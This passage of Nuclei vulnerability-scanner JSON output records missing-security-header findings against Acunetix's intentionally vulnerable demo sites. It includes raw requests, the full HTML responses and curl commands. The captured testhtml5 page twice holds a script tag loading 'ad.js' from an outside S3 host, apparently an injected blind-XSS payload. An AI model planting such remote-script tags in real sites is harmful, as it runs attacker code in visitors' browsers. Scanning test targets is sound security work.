--\\u003e\\n\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/libs/sessvars.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/post.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/controllers/controllers.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/services/itemsService.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://bxss.s3.amazonaws.com/ad.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:16.378320236Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.61' 'http://testhtml5.vulnweb.com/logout'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com\",\"matched-at\":\"http://testhtml5.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nAccess-Control-Allow-Origin: *\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n\\n \\u003clink rel=\\\"icon\\\" type=\\\"image/png\\\" href=\\\"http://www.acunetix.com/favicon.ico\\\"\\u003e\\n\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n Vulnerable HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n\\n \\u003cp class=\\\"navbar-text pull-right\\\"\\u003e\\n \\n \\u003ca href=\\\"#myModal\\\" role=\\\"button\\\" class=\\\"btn\\\" data-toggle=\\\"modal\\\"\\u003eLogin\\u003c/a\\u003e\\n \\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eViews\\u003c/li\\u003e\\n \\u003cli id=\\\"popularLi\\\" class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/popular\\\"\\u003ePopular\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/latest\\\"\\u003eLatest\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/carousel\\\"\\u003eCarousel\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/archive\\\"\\u003eArchive\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eWebsite\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/about\\\"\\u003eAbout\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/contact\\\"\\u003eContact\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv ng-view\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"pull-left\\\" style=\\\"font-size: xx-small;\\\" id=\\\"refId\\\"\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp class=\\\"pull-left\\\"\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\n\\u003c!-- Modal --\\u003e\\n\\u003cdiv id=\\\"myModal\\\" class=\\\"modal hide fade\\\" tabindex=\\\"-1\\\" role=\\\"dialog\\\" aria-labelledby=\\\"myModalLabel\\\" aria-hidden=\\\"true\\\"\\u003e\\n \\u003cform class=\\\"modal-body\\\" action=\\\"/login\\\" method=\\\"POST\\\" id=\\\"loginForm\\\"\\u003e\\n \\u003cdiv class=\\\"modal-header\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"close\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003e×\\u003c/button\\u003e\\n \\u003ch3 id=\\\"myModalLabel\\\"\\u003eLogin\\u003c/h3\\u003e\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-body\\\"\\u003e\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Username --\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"username\\\"\\u003eUsername\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"text\\\" id=\\\"username\\\" name=\\\"username\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\" value=\\\"admin\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Password--\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"password\\\"\\u003ePassword\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"password\\\" id=\\\"password\\\" name=\\\"password\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003ca href=\\\"#\\\" class=\\\"btn\\\" id=\\\"loginFormForgot\\\"\\u003eForgot Pwd?\\u003c/a\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-footer\\\"\\u003e\\n \\u003cbutton class=\\\"btn btn-primary\\\" id=\\\"loginFormSubmit\\\"\\u003eLogin\\u003c/button\\u003e\\n \\u003cbutton class=\\\"btn\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003eClose\\u003c/button\\u003e\\n \\u003c/div\\u003e\\n \\u003c/form\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c!-- App libs --\\u003e\\n\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/libs/sessvars.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/post.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/controllers/controllers.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/services/itemsService.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://bxss.s3.amazonaws.com/ad.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:16.81509869Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46' 'http://testhtml5.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testaspnet.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testaspnet.vulnweb.com\",\"matched-at\":\"http://testaspnet.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testaspnet.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 14069\\r\\nCache-Control: private\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:45 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nSet-Cookie: ASP.NET_SessionId=vmit32btaeasjnawkbexxh55; path=/; HttpOnly\\r\\nX-Aspnet-Version: 2.0.50727\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.0 Transitional//EN\\\" \\u003e\\r\\n\\u003cHTML\\u003e\\r\\n\\t\\u003cHEAD\\u003e\\r\\n\\t\\t\\u003ctitle\\u003eacublog news\\u003c/title\\u003e\\r\\n\\t\\t\\u003cMETA http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=windows-1252\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"Microsoft Visual Studio .NET 7.1\\\" name=\\\"GENERATOR\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"C#\\\" name=\\\"CODE_LANGUAGE\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"JavaScript\\\" name=\\\"vs_defaultClientScript\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"http://schemas.microsoft.com/intellisense/ie5\\\" name=\\\"vs_targetSchema\\\"\\u003e\\r\\n\\t\\t\\u003cLINK href=\\\"styles.css\\\" type=\\\"text/css\\\" rel=\\\"stylesheet\\\"\\u003e\\r\\n\\t\\u003c/HEAD\\u003e\\r\\n\\t\\u003cbody\\u003e\\r\\n\\t\\t\\u003cform name=\\\"Form1\\\" method=\\\"post\\\" action=\\\"default.aspx\\\" id=\\\"Form1\\\"\\u003e\\r\\n\\u003cdiv\\u003e\\r\\n\\u003cinput type=\\\"hidden\\\" name=\\\"__EVENTTARGET\\\" id=\\\"__EVENTTARGET\\\" value=\\\"\\\" /\\u003e\\r\\n\\u003cinput type=\\\"hidden\\\" name=\\\"__EVENTARGUMENT\\\" id=\\\"__EVENTARGUMENT\\\" value=\\\"\\\" /\\u003e\\r\\n\\u003cinput type=\\\"hidden\\\" name=\\\"__VIEWSTATE\\\" id=\\\"__VIEWSTATE\\\" value=\\\"/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5\\\" /\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\r\\n\\u003cscript type=\\\"text/javascript\\\"\\u003e\\r\\n//\\u003c![CDATA[\\r\\nvar theForm = document.forms['Form1'];\\r\\nif (!theForm) {\\r\\n theForm = document.Form1;\\r\\n}\\r\\nfunction __doPostBack(eventTarget, eventArgument) {\\r\\n if (!theForm.onsubmit || (theForm.onsubmit() != false)) {\\r\\n theForm.__EVENTTARGET.value = eventTarget;\\r\\n theForm.__EVENTARGUMENT.value = eventArgument;\\r\\n theForm.submit();\\r\\n }\\r\\n}\\r\\n//]]\\u003e\\r\\n\\u003c/script\\u003e\\r\\n\\r\\n\\r\\n\\u003cdiv\\u003e\\r\\n\\r\\n\\t\\u003cinput type=\\\"hidden\\\" name=\\\"__VIEWSTATEGENERATOR\\\" id=\\\"__VIEWSTATEGENERATOR\\\" value=\\\"CA0B0334\\\" /\\u003e\\r\\n\\t\\u003cinput type=\\\"hidden\\\" name=\\\"__EVENTVALIDATION\\\" id=\\\"__EVENTVALIDATION\\\" value=\\\"/wEWVwLpus/wCAKv3NmgDwKB48+iAgK20qX9DwK20qX9DwK20tmRBwK20tmRBwK20o35BQK20o35BQK20qGcDQK20qGcDQKL+bMFAov5swUCi/mn2AkCi/mn2AkCi/nb/AICi/nb/AICi/nPkwoCi/nPkwoCi/njtgMCi/njtgMCi/mXzQwCi/mXzQwCi/mL4AUCi/mL4AUCi/m/hw0Ci/m/hw0Ci/mT7AsCi/mT7AsCi/mHgwMCi/mHgwMCvJPzxAkCvJPzxAkCvJPnmwECvJPnmwECvJObvgoCvJObvgoCvJOP1QMCvJOP1QMCvJOj6AwCvJOj6AwCvJPXjAQCvJPXjAQCvJPLow0CvJPLow0CvJP/xgYCvJP/xgYCvJPTrwMCvJPTrwMCvJPHwgwCvJPHwgwCkbrR6w8CkbrR6w8CkbrFjgcCkbrFjgcCkbr5JQKRuvklApG67fgJApG67fgJApG6gZ8BApG6gZ8BApG6tbIKApG6tbIKApG6qckDApG6qckDApG63e0MApG63e0MApG6sdUJApG6sdUJApG6pegCApG6pegCAtTZ5J4HAtTZ5J4HAtTZmDUC1NmYNQLU2YzICQLU2YzICQLU2aDvAgLU2aDvAgLU2dSDCgLU2dSDCgLU2cimAwLU2cimAwLU2fz9DALU2fz9DALU2ZCQBALU2ZCQBBM7QfLxs46Xr8rthEeGdU4fr+Ig\\\" /\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\t\\t\\t\\r\\n\\u003cTABLE id=\\\"Table1\\\" cellSpacing=\\\"0\\\" cellPadding=\\\"5\\\" width=\\\"790\\\" align=\\\"center\\\" border=\\\"0\\\"\\u003e\\r\\n\\t\\u003cTR\\u003e\\r\\n\\t\\t\\u003cTD style=\\\"COLOR: #e6dccf\\\" bgColor=\\\"#806640\\\" height=\\\"75\\\"\\u003e\\u003ca href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cIMG src=\\\"images/logo_acunetix.gif\\\" align=\\\"absMiddle\\\" border=\\\"0\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003c/TD\\u003e\\r\\n\\t\\t\\u003cTD style=\\\"FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf\\\" align=\\\"right\\\" bgColor=\\\"#806640\\\"\\r\\n\\t\\t\\theight=\\\"75\\\"\\u003eTest Website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/TD\\u003e\\r\\n\\t\\u003c/TR\\u003e\\r\\n\\u003c/TABLE\\u003e\\r\\n\\u003cTABLE id=\\\"Table2\\\" cellSpacing=\\\"0\\\" cellPadding=\\\"5\\\" width=\\\"790\\\" align=\\\"center\\\" border=\\\"0\\\"\\u003e\\r\\n\\t\\u003cTR\\u003e\\r\\n\\t\\t\\u003cTD class=\\\"MenuBar\\\" style=\\\"BORDER-LEFT: #806040 1px solid\\\"\\u003e\\u003cA class=\\\"menu\\\" title=\\\"About\\\" href=\\\"about.aspx\\\"\\u003eabout\\u003c/A\\u003e\\r\\n\\t\\t\\t\\u003cA class=\\\"menu\\\" title=\\\"Latest news\\\" href=\\\"default.aspx\\\"\\u003enews\\u003c/A\\u003e \\u003ca href=\\\"login.aspx\\\" id=\\\"Mainmenu2_lnkLog\\\" class=\\\"menu\\\" name=\\\"lnkLog\\\"\\u003elogin\\u003c/a\\u003e \\u003ca href=\\\"Signup.aspx\\\" id=\\\"Mainmenu2_lnkSignup\\\" class=\\\"menu\\\" name=\\\"lnkSignup\\\"\\u003e\\r\\n\\t\\t\\t\\tsignup\\u003c/a\\u003e \\u003cA class=\\\"menu\\\" title=\\\"Network scanner\\\" href=\\\"https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/\\\"\\u003enetwork scanner\\u003c/A\\u003e\\r\\n\\t\\t\\t\\t\\u003cA class=\\\"menu\\\" title=\\\"Network vuln help\\\" href=\\\"https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/\\\"\\u003enetwork vuln help\\u003c/A\\u003e\\r\\n\\t\\t\\u003c/TD\\u003e\\r\\n\\t\\t\\u003ctd class=\\\"MenuBar\\\" align=\\\"right\\\" width=\\\"50px\\\"\\u003e\\r\\n\\t\\t\\t\\u003cA href=\\\"rssFeed.aspx\\\"\\u003e\\u003cIMG src=\\\"images/rss.gif\\\" border=\\\"0\\\"\\u003e\\u003c/A\\u003e\\r\\n\\t\\t\\u003c/td\\u003e\\r\\n\\t\\u003c/TR\\u003e\\r\\n\\u003c/TABLE\\u003e\\r\\n\\r\\n\\t\\t\\t\\u003cTABLE id=\\\"Table1\\\" cellSpacing=\\\"0\\\" cellPadding=\\\"10\\\" width=\\\"790\\\" align=\\\"center\\\" border=\\\"0\\\"\\u003e\\r\\n\\t\\t\\t\\t\\u003cTR\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003cTD id=\\\"tdPageData\\\" valign=\\\"top\\\"\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003cDIV class=\\\"NewsDate\\\"\\u003eposted by \\u003cstrong\\u003eadmin \\u003c/strong\\u003e on 5/16/2019 12:32:30 PM\\u0026nbsp;\\u003ca href=\\\"Comments.aspx?id=0\\\" class=\\\"NewsOperation\\\"\\u003e(37) comments\\u003c/a\\u003e\\u003c/DIV\\u003e\\u003ca href=\\\"ReadNews.aspx?id=0\\u0026NewsAd=ads/def.html\\\" class=\\\"NewsTitle\\\"\\u003eAcunetix Vulnerability Scanner Now With Network Security Scans\\u003c/a\\u003e\\u003cDIV class=\\\"NewsShort\\\"\\u003eSeamless OpenVAS integration now also available on Windows and Linux\\u003c/DIV\\u003e\\u003cDIV class=\\\"NewsDate\\\"\\u003eposted by \\u003cstrong\\u003eadmin \\u003c/strong\\u003e on 11/8/2005 11:37:35 AM\\u0026nbsp;\\u003ca href=\\\"Comments.aspx?id=3\\\" class=\\\"NewsOperation\\\"\\u003e(37) comments\\u003c/a\\u003e\\u003c/DIV\\u003e\\u003ca href=\\\"ReadNews.aspx?id=3\\u0026NewsAd=ads/def.html\\\" class=\\\"NewsTitle\\\"\\u003eAcunetix Web Vulnerability Scanner beta released!\\u003c/a\\u003e\\u003cDIV class=\\\"NewsShort\\\"\\u003e26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.\\u003c/DIV\\u003e\\u003cDIV class=\\\"NewsDate\\\"\\u003eposted by \\u003cstrong\\u003eadmin \\u003c/strong\\u003e on 11/8/2005 11:35:22 AM\\u0026nbsp;\\u003ca href=\\\"Comments.aspx?id=2\\\" class=\\\"NewsOperation\\\"\\u003e(41) comments\\u003c/a\\u003e\\u003c/DIV\\u003e\\u003ca href=\\\"ReadNews.aspx?id=2\\u0026NewsAd=ads/def.html\\\" class=\\\"NewsTitle\\\"\\u003eWeb attacks - can your web applications withstand the force?\\u003c/a\\u003e\\u003cDIV class=\\\"NewsShort\\\"\\u003e21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.\\u003c/DIV\\u003e\\u003c/TD\\u003e\\r\\n\\r\\n\\t\\t\\t\\t\\t\\u003cTD vAlign=\\\"top\\\" width=\\\"200\\\"\\u003e\\r\\n\\t\\t\\t\\t\\t\\t\\u003ctable id=\\\"RightPanel1_Calendar\\\" class=\\\"Calendar\\\" cellspacing=\\\"0\\\" cellpadding=\\\"1\\\" title=\\\"Calendar\\\" border=\\\"0\\\" style=\\\"background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;\\\"\\u003e\\r\\n\\t\\u003ctr\\u003e\\u003ctd colspan=\\\"7\\\" style=\\\"background-color:#E6B873;\\\"\\u003e\\u003ctable class=\\\"Calendar\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;\\\"\\u003e\\r\\n\\t\\t\\u003ctr\\u003e\\u003ctd style=\\\"width:15%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','V9040')\\\" style=\\\"color:Black\\\" title=\\\"Go to the previous month\\\"\\u003e\\u0026lt;\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:70%;\\\"\\u003eNovember 2024\\u003c/td\\u003e\\u003ctd align=\\\"right\\\" style=\\\"width:15%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','V9101')\\\" style=\\\"color:Black\\\" title=\\\"Go to the next month\\\"\\u003e\\u0026gt;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\r\\n\\t\\u003c/table\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Sunday\\\" scope=\\\"col\\\"\\u003eSun\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Monday\\\" scope=\\\"col\\\"\\u003eMon\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Tuesday\\\" scope=\\\"col\\\"\\u003eTue\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Wednesday\\\" scope=\\\"col\\\"\\u003eWed\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Thursday\\\" scope=\\\"col\\\"\\u003eThu\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Friday\\\" scope=\\\"col\\\"\\u003eFri\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Saturday\\\" scope=\\\"col\\\"\\u003eSat\\u003c/th\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9066')\\\" style=\\\"color:Black\\\" title=\\\"October 27\\\"\\u003e27\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" 